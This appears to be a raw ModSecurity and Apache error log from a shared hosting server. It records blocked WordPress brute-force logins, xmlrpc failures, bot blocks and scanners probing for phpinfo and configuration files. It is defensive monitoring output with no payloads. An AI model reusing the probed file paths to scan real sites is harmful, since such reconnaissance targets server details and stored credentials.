[Tue May 26 13:30:57.715035 2026] [security2:error] [pid 512344:tid 512477] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTOcbElyei4S77DQcJAAAAAAM"]
[Tue May 26 13:30:58.941159 2026] [security2:error] [pid 512344:tid 512585] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTOsbElyei4S77DQcJCwAAAG8"]
[Tue May 26 13:30:59.088618 2026] [security2:error] [pid 512344:tid 512364] [remote 217.112.89.35:51656] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.89.112.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahVTOsbElyei4S77DQcJEQAAFBM"]
[Tue May 26 13:31:02.255471 2026] [security2:error] [pid 512745:tid 512966] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTPXKSB_s2CvZg7xNw4gAAAWU"]
[Tue May 26 13:31:02.886982 2026] [security2:error] [pid 512344:tid 512600] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTPsbElyei4S77DQcJPQAAAH4"]
[Tue May 26 13:31:05.031552 2026] [security2:error] [pid 512344:tid 512565] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTQMbElyei4S77DQcJYwAAAFs"]
[Tue May 26 13:31:07.916687 2026] [security2:error] [pid 512745:tid 512897] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTQ3KSB_s2CvZg7xNxMgAAASA"]
[Tue May 26 13:31:10.163318 2026] [security2:error] [pid 512745:tid 512900] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTRXKSB_s2CvZg7xNxVQAAASM"]
[Tue May 26 13:31:11.714701 2026] [security2:error] [pid 512745:tid 512834] [remote 5.250.187.247:37988] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.187.250.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/wp-login.php"] [unique_id "ahVTR3KSB_s2CvZg7xNxbgABGFg"]
[Tue May 26 13:31:11.776836 2026] [security2:error] [pid 512745:tid 512850] [remote 161.35.162.136:40718] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.162.35.161.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahVTR3KSB_s2CvZg7xNxbwABC2g"]
[Tue May 26 13:31:11.857039 2026] [security2:error] [pid 512344:tid 512528] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTR8bElyei4S77DQcJugAAADY"]
[Tue May 26 13:31:13.030893 2026] [security2:error] [pid 512745:tid 512961] [client 91.92.42.63:65034] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jkjuice.taotechservices.com"] [uri "/functions.php"] [unique_id "ahVTSXKSB_s2CvZg7xNxfwAAAWA"], referer: http://jkjuice.taotechservices.com/
[Tue May 26 13:31:13.253498 2026] [security2:error] [pid 512745:tid 512914] [client 91.92.42.63:29796] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jkjuice.taotechservices.com"] [uri "/pinfo.php"] [unique_id "ahVTSXKSB_s2CvZg7xNxhAAAATE"], referer: http://jkjuice.taotechservices.com/
[Tue May 26 13:31:13.258495 2026] [security2:error] [pid 512745:tid 512977] [client 91.92.42.63:29804] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jkjuice.taotechservices.com"] [uri "/configuration.php"] [unique_id "ahVTSXKSB_s2CvZg7xNxhQAAAXA"], referer: http://jkjuice.taotechservices.com/
[Tue May 26 13:31:13.270544 2026] [security2:error] [pid 512745:tid 512913] [client 91.92.42.63:29820] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jkjuice.taotechservices.com"] [uri "/php_info.php"] [unique_id "ahVTSXKSB_s2CvZg7xNxiQAAATA"], referer: http://jkjuice.taotechservices.com/
[Tue May 26 13:31:13.301240 2026] [security2:error] [pid 512745:tid 512941] [client 91.92.42.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "jkjuice.taotechservices.com"] [uri "/index.php"] [unique_id "ahVTSXKSB_s2CvZg7xNxgwAAAUw"], referer: http://jkjuice.taotechservices.com/
[Tue May 26 13:31:13.330989 2026] [security2:error] [pid 512745:tid 512953] [client 91.92.42.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "jkjuice.taotechservices.com"] [uri "/index.php"] [unique_id "ahVTSXKSB_s2CvZg7xNxiAAAAVg"], referer: http://jkjuice.taotechservices.com/
[Tue May 26 13:31:13.344337 2026] [security2:error] [pid 512344:tid 512594] [client 91.92.42.63:29830] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jkjuice.taotechservices.com"] [uri "/index.php"] [unique_id "ahVTScbElyei4S77DQcJzgAAAHg"], referer: http://jkjuice.taotechservices.com/
[Tue May 26 13:31:13.378354 2026] [security2:error] [pid 512344:tid 512503] [client 91.92.42.63:29840] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jkjuice.taotechservices.com"] [uri "/server_info.php"] [unique_id "ahVTScbElyei4S77DQcJ0AAAAB0"], referer: http://jkjuice.taotechservices.com/
[Tue May 26 13:31:13.379135 2026] [security2:error] [pid 512344:tid 512504] [client 91.92.42.63:29834] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jkjuice.taotechservices.com"] [uri "/portal/phpinfo.php"] [unique_id "ahVTScbElyei4S77DQcJ0QAAAB4"], referer: http://jkjuice.taotechservices.com/
[Tue May 26 13:31:13.395926 2026] [security2:error] [pid 512344:tid 512544] [client 91.92.42.63:29856] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jkjuice.taotechservices.com"] [uri "/test.php"] [unique_id "ahVTScbElyei4S77DQcJ0gAAAEY"], referer: http://jkjuice.taotechservices.com/
[Tue May 26 13:31:13.419136 2026] [security2:error] [pid 512745:tid 512984] [client 91.92.42.63:29878] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jkjuice.taotechservices.com"] [uri "/phpinfo/info.php"] [unique_id "ahVTSXKSB_s2CvZg7xNxlQAAAXc"], referer: http://jkjuice.taotechservices.com/
[Tue May 26 13:31:13.452106 2026] [security2:error] [pid 512745:tid 512989] [client 91.92.42.63:29908] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/server_info.php"] [unique_id "ahVTSXKSB_s2CvZg7xNxmwAAAXw"], referer: http://taotechservices.com/
[Tue May 26 13:31:13.454606 2026] [security2:error] [pid 512745:tid 512950] [client 91.92.42.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "jkjuice.taotechservices.com"] [uri "/index.php"] [unique_id "ahVTSXKSB_s2CvZg7xNxkAAAAVU"], referer: http://jkjuice.taotechservices.com/
[Tue May 26 13:31:13.480885 2026] [security2:error] [pid 512745:tid 512996] [client 91.92.42.63:29922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/test.php"] [unique_id "ahVTSXKSB_s2CvZg7xNxnAAAAYM"], referer: http://taotechservices.com/
[Tue May 26 13:31:13.480999 2026] [security2:error] [pid 512745:tid 512919] [client 91.92.42.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "jkjuice.taotechservices.com"] [uri "/index.php"] [unique_id "ahVTSXKSB_s2CvZg7xNxlAAAATY"], referer: http://jkjuice.taotechservices.com/
[Tue May 26 13:31:13.505673 2026] [security2:error] [pid 512745:tid 512982] [client 91.92.42.63:29946] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/php_info.php"] [unique_id "ahVTSXKSB_s2CvZg7xNxogAAAXU"], referer: http://taotechservices.com/
[Tue May 26 13:31:13.510157 2026] [security2:error] [pid 512344:tid 512518] [client 91.92.42.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "jkjuice.taotechservices.com"] [uri "/index.php"] [unique_id "ahVTScbElyei4S77DQcJ1gAAACw"], referer: http://jkjuice.taotechservices.com/
[Tue May 26 13:31:13.553929 2026] [security2:error] [pid 512344:tid 512573] [client 91.92.42.63:29948] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/configuration.php"] [unique_id "ahVTScbElyei4S77DQcJ2AAAAGM"], referer: http://taotechservices.com/
[Tue May 26 13:31:13.568385 2026] [security2:error] [pid 512344:tid 512575] [client 91.92.42.63:29962] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/phpinfo/info.php"] [unique_id "ahVTScbElyei4S77DQcJ3AAAAGU"], referer: http://taotechservices.com/
[Tue May 26 13:31:13.602963 2026] [security2:error] [pid 512344:tid 512533] [client 91.92.42.63:29976] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/functions.php"] [unique_id "ahVTScbElyei4S77DQcJ4wAAADs"], referer: http://taotechservices.com/
[Tue May 26 13:31:13.644530 2026] [security2:error] [pid 512344:tid 512568] [client 91.92.42.63:29996] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/pinfo.php"] [unique_id "ahVTScbElyei4S77DQcJ5wAAAF4"], referer: http://taotechservices.com/
[Tue May 26 13:31:13.718073 2026] [security2:error] [pid 512344:tid 512496] [client 91.92.42.63:30058] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/portal/phpinfo.php"] [unique_id "ahVTScbElyei4S77DQcJ6gAAABY"], referer: http://taotechservices.com/
[Tue May 26 13:31:13.759779 2026] [security2:error] [pid 512745:tid 512988] [client 91.92.42.63:30072] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/index.php"] [unique_id "ahVTSXKSB_s2CvZg7xNxpAAAAXs"], referer: http://taotechservices.com/
[Tue May 26 13:31:14.708041 2026] [security2:error] [pid 512344:tid 512552] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTSsbElyei4S77DQcJ9AAAAE4"]
[Tue May 26 13:31:16.380781 2026] [security2:error] [pid 512745:tid 512971] [client 34.91.36.231:49152] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^/llms.txt" against "REQUEST_URI" required. [file "/opt/mod_security/hg_rules.conf"] [line "588"] [id "999814"] [msg "Misbehaving AI Crawler"] [hostname "www.consultrgb.com"] [uri "/"] [unique_id "ahVTTHKSB_s2CvZg7xNx4QAAAWo"]
[Tue May 26 13:31:16.380862 2026] [security2:error] [pid 512745:tid 512971] [client 34.91.36.231:49152] ModSecurity: Warning. Matched phrase "Scrapy" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.consultrgb.com"] [uri "/"] [unique_id "ahVTTHKSB_s2CvZg7xNx4QAAAWo"]
[Tue May 26 13:31:16.830123 2026] [security2:error] [pid 512745:tid 512896] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTTHKSB_s2CvZg7xNx4wAAAR8"]
[Tue May 26 13:31:19.201423 2026] [security2:error] [pid 512344:tid 512574] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTTsbElyei4S77DQcKHwAAAGQ"]
[Tue May 26 13:31:21.321632 2026] [security2:error] [pid 512745:tid 512965] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTUHKSB_s2CvZg7xNyJgAAAWQ"]
[Tue May 26 13:31:21.482855 2026] [security2:error] [pid 512745:tid 512939] [client 95.70.131.179:63231] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahVTUXKSB_s2CvZg7xNyJwAAAUo"]
[Tue May 26 13:31:21.483003 2026] [security2:error] [pid 512745:tid 512939] [client 95.70.131.179:63231] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahVTUXKSB_s2CvZg7xNyJwAAAUo"]
[Tue May 26 13:31:22.678003 2026] [security2:error] [pid 512344:tid 512548] [client 110.249.201.70:28866] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.karuppuswamykovil.in"] [uri "/robots.txt"] [unique_id "ahVTUsbElyei4S77DQcKTQAAAEo"]
[Tue May 26 13:31:22.942462 2026] [security2:error] [pid 512745:tid 512756] [remote 95.70.131.179:0] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVTUnKSB_s2CvZg7xNyPAABVgo"]
[Tue May 26 13:31:22.942668 2026] [security2:error] [pid 512745:tid 512951] [client 95.70.131.179:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVTUnKSB_s2CvZg7xNyPAABVgo"]
[Tue May 26 13:31:23.041950 2026] [security2:error] [pid 512344:tid 512387] [remote 172.236.172.195:36438] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 195.172.236.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahVTUsbElyei4S77DQcKUAAAbio"]
[Tue May 26 13:31:23.763493 2026] [security2:error] [pid 512745:tid 512837] [remote 74.7.241.58:43312] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahVTU3KSB_s2CvZg7xNySwABVFs"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes/SimplePie/Cache
[Tue May 26 13:31:23.892160 2026] [security2:error] [pid 512745:tid 512933] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTU3KSB_s2CvZg7xNyRAAAAUQ"]
[Tue May 26 13:31:25.429724 2026] [security2:error] [pid 512745:tid 512890] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTVXKSB_s2CvZg7xNyYwAAARk"]
[Tue May 26 13:31:25.707153 2026] [security2:error] [pid 512344:tid 512520] [client 85.208.96.209:57778] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/4/"] [unique_id "ahVTVcbElyei4S77DQcKdwAAAC4"]
[Tue May 26 13:31:25.707282 2026] [security2:error] [pid 512344:tid 512520] [client 85.208.96.209:57778] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/4/"] [unique_id "ahVTVcbElyei4S77DQcKdwAAAC4"]
[Tue May 26 13:31:27.068479 2026] [security2:error] [pid 512745:tid 512860] [remote 178.156.182.155:34054] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.182.156.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVTVnKSB_s2CvZg7xNyigABLnI"]
[Tue May 26 13:31:27.549417 2026] [security2:error] [pid 512745:tid 512979] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTV3KSB_s2CvZg7xNyjwAAAXI"]
[Tue May 26 13:31:29.048800 2026] [security2:error] [pid 512745:tid 512880] [client 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVTV3KSB_s2CvZg7xNymAABD2k"]
[Tue May 26 13:31:29.421360 2026] [proxy:error] [pid 512344:tid 512550] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:31:29.421435 2026] [proxy_http:error] [pid 512344:tid 512550] [client 43.167.236.228:34590] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:31:29.422158 2026] [proxy:error] [pid 512344:tid 512550] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:31:29.422192 2026] [proxy_http:error] [pid 512344:tid 512550] [client 43.167.236.228:34590] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:31:29.696411 2026] [proxy:error] [pid 512745:tid 512936] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:31:29.696459 2026] [proxy_http:error] [pid 512745:tid 512936] [client 165.227.35.65:42730] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:31:29.697050 2026] [proxy:error] [pid 512745:tid 512936] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:31:29.697080 2026] [proxy_http:error] [pid 512745:tid 512936] [client 165.227.35.65:42730] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:31:29.886671 2026] [proxy:error] [pid 512344:tid 512593] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:31:29.886728 2026] [proxy_http:error] [pid 512344:tid 512593] [client 165.227.35.65:42732] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: http://cpcalendars.dassmerchandise.com/
[Tue May 26 13:31:29.887309 2026] [proxy:error] [pid 512344:tid 512593] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:31:29.887340 2026] [proxy_http:error] [pid 512344:tid 512593] [client 165.227.35.65:42732] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: http://cpcalendars.dassmerchandise.com/
[Tue May 26 13:31:30.073767 2026] [security2:error] [pid 512344:tid 512517] [client 178.20.210.57:43658] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "koneksi.com.co"] [uri "/index.php"] [unique_id "ahVTWcbElyei4S77DQcKrQAAK2Q"]
[Tue May 26 13:31:30.226438 2026] [proxy:error] [pid 512745:tid 512881] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:31:30.226493 2026] [proxy_http:error] [pid 512745:tid 512881] [client 165.227.35.65:40972] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:31:30.227095 2026] [proxy:error] [pid 512745:tid 512881] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:31:30.227127 2026] [proxy_http:error] [pid 512745:tid 512881] [client 165.227.35.65:40972] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:31:30.358019 2026] [security2:error] [pid 512344:tid 512567] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTWcbElyei4S77DQcKtAAAAF0"]
